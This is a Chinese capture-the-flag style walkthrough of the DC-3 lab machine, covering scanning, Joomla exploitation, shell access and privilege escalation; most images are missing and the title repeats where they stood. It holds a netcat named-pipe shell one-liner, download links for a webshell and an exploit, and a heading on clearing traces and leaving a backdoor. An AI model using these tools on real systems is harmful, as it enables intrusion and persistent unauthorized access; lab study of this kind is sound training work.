靶机记录(十一):DC-3

目录

主机发现

端口扫描

Web渗透 

可能有用的页面

漏洞挖掘

CMS利用

GetShell

法1

 法2

 法3:大马

提权

法1(失败了)

法2

 清痕迹,留后门


主机发现

靶机记录(十一):DC-3

端口扫描

靶机记录(十一):DC-3

 靶机记录(十一):DC-3

Web渗透 

可能有用的页面

靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

漏洞挖掘

CMS利用

 用 joomscan 获取 CMS 具体版本

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

 GetShell

法1

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

mkfifo /tmp/t
cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t

靶机记录(十一):DC-3靶机记录(十一):DC-3

 法2

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

 法3:大马

链接:https://pan.baidu.com/s/1hV7YYlsn1YO9nDqoSNBH5A 
提取码:lish

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

 提权

法1(失败了)

靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

法2

靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

可能下不下来

链接:https://pan.baidu.com/s/1CfR0EjF4t0vQXm7zrpO0mg

提取码:lish

 靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3靶机记录(十一):DC-3

 清痕迹,留后门

上一篇:靶机记录(三):bulldog


下一篇:通达OA11.7漏洞 SSRF+Redis getshell